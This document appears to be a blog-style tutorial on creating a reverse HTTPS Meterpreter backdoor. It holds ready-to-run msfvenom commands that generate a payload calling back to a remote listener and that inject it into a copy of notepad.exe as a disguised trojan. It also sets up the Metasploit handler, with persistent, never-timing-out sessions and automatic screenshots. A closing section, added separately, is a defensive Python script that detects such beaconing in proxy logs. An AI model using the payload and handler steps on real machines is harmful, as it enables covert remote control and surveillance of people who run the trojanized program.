Simple Background HTTPS Reverse Meterpreter

Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime. It communicates over the stager socket and provides a comprehensive client-side Ruby API. It features command history, tab completion, channels, and more.

Msfvenom combines payload generation and encoding in a single tool.

msfvenom usage

Usage: /usr/bin/msfvenom [options] <var=val>
 
Options:
    -p, --payload       <payload>    Payload to use. Specify a '-' or stdin to use custom payloads
        --payload-options            List the payload standard options
    -l, --list          [type]       List a module type. Options are: payloads, encoders, nops, all
    -n, --nopsled       <length>     Prepend a nopsled of [length] size on to the payload
    -f, --format        <format>     Output format (use --help-formats for a list)
        --help-formats               List available formats
    -e, --encoder       <encoder>    The encoder to use
    -a, --arch          <arch>       The architecture to use
        --platform      <platform>   The platform of the payload
        --help-platforms             List available platforms
    -s, --space         <length>     The maximum size of the resulting payload
        --encoder-space <length>     The maximum size of the encoded payload (defaults to the -s value)
    -b, --bad-chars     <list>       The list of characters to avoid example: '\x00\xff'
    -i, --iterations    <count>      The number of times to encode the payload
    -c, --add-code      <path>       Specify an additional win32 shellcode file to include
    -x, --template      <path>       Specify a custom executable file to use as a template
    -k, --keep                       Preserve the template behavior and inject the payload as a new thread
    -o, --out           <path>       Save the payload
    -v, --var-name      <name>       Specify a custom variable name to use for certain output formats
        --smallest                   Generate the smallest possible payload
    -h, --help                       Show this message

Generate reverse https meterpreter payload

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_https lhost=example.com lport=443 -f exe -o my.exe

Binding exe files

msfvenom -a x86 --platform windows -x notepad.exe -k -p windows/meterpreter/reverse_https lhost=example.com lport=443 -b "\x00" -f exe -o new_notepad.exe

Run metasploit handler (server)

msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST example.com
set LPORT 443

Session will never time out

set SessionCommunicationTimeout 0

Execute commands on new session connection

set autorunscript multi_console_command -rc /root/script.rc

Don’t exit once the first meterpreter connection is established

set ExitOnSession false

Run all meterpreter connections in the background automatically

exploit -j

List sessions

sessions -l

Interact with a shell

sessions -i 5

Send interaction with session 5 to background
Press ctrl+z

script.rc contents

sysinfo
screenshot
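
Detecting this setup from the network side

A reverse_https session to example.com on port 443 that never times out, as configured above, appears in proxy or firewall logs as one client reconnecting to the same destination again and again. The Python below is an added example, not part of the original post or of Metasploit; the log format, client addresses, thresholds and the premise that an idle session polls at near-regular intervals are assumptions.

```python
"""Flag client/destination pairs whose HTTPS connections recur at near-constant intervals."""
from collections import defaultdict
from datetime import datetime, timedelta
from statistics import mean, pstdev

def parse(lines):
    """Yield (timestamp, client, dest) from 'ISO-time client dest port' lines on port 443."""
    for line in lines:
        parts = line.split()
        if len(parts) != 4 or parts[3] != "443":
            continue  # skip malformed lines and non-HTTPS traffic
        try:
            yield datetime.fromisoformat(parts[0]), parts[1], parts[2]
        except ValueError:
            continue  # skip lines with an unparseable timestamp

def find_beacons(lines, min_events=8, max_cv=0.2):
    """Return sorted (client, dest, mean_gap_seconds, cv) for low-jitter recurring pairs."""
    seen = defaultdict(list)
    for ts, client, dest in parse(lines):
        seen[(client, dest)].append(ts)
    hits = []
    for (client, dest), stamps in seen.items():
        if len(stamps) < min_events:
            continue  # too few connections to judge regularity
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        avg = mean(gaps)
        if avg <= 0:
            continue  # all events share one timestamp
        cv = pstdev(gaps) / avg  # coefficient of variation: 0 means perfectly regular
        if cv <= max_cv:
            hits.append((client, dest, round(avg, 1), round(cv, 3)))
    return sorted(hits)

def sample_log():
    """Constructed data: one client polling example.com steadily, one browsing in bursts."""
    t0 = datetime(2024, 5, 1, 9, 0, 0)
    poll = [0, 10, 20, 31, 40, 50, 61, 70, 80, 90]        # roughly every 10 s
    browse = [0, 2, 3, 45, 47, 130, 131, 300, 302, 640]   # bursty, human-driven
    stamp = lambda s: (t0 + timedelta(seconds=s)).isoformat()
    rows = [f"{stamp(s)} 10.0.0.21 example.com 443" for s in poll]
    rows += [f"{stamp(s)} 10.0.0.34 news.example.org 443" for s in browse]
    return rows + ["garbage line", f"{stamp(5)} 10.0.0.21 example.com 80"]

if __name__ == "__main__":
    for hit in find_beacons(sample_log()):
        print(hit)
```

Pairs it flags are candidates for follow-up on the endpoint (which process owns the connection, and whether that binary matches a known-good hash), not proof of compromise, since update checkers and telemetry agents also poll on a schedule.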